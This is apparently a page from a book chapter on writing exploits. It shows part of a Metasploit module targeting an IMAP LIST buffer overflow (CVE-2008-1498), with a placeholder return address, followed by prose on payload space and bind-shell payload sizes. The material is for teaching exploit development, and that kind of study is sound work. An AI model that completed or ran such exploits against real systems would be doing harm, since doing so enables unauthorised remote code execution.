Creating Your Own Exploits
205
'References' =>
[
[ 'BID', '28260' ],
[ 'CVE', '2008-1498' ],
[ 'URL', 'http://www.exploit-db.com/exploits/5259' ],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 10351,
'DisableNops' => true,
'BadChars' => "\x00"
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => 0xDEADBEEF } ], # p/p/r TBD
],
'DisclosureDate' => 'March 13 2008',
'DefaultTarget' => 0))
end
def exploit
connected = connect_login
lead = "\x41" * 10360
evil = lead + "\x43" * 4
print_status("Sending payload")
sploit = '0002 LIST () "/' + evil + '" "PWNED"' + "\r\n"
sock.put(sploit)
handler
disconnect
end
end
The
'Space'
declaration at refers to the space available for shellcode.
This declaration is very important in an exploit module because it deter-
mines which payloads Metasploit will allow you to use when running your
exploit. Some payloads require much more space than others, so try not to
overstate this value. Payload sizes vary greatly and encoding increases their
sizes. To see the size of an unencoded payload, you would use the
info
com-
mand followed by the name of the payload and look for the
Total size
value,
as shown here:
msf >
info payload/windows/shell_bind_tcp
Name: Windows Command Shell, Bind TCP Inline
Module: payload/windows/shell_bind_tcp
Version: 8642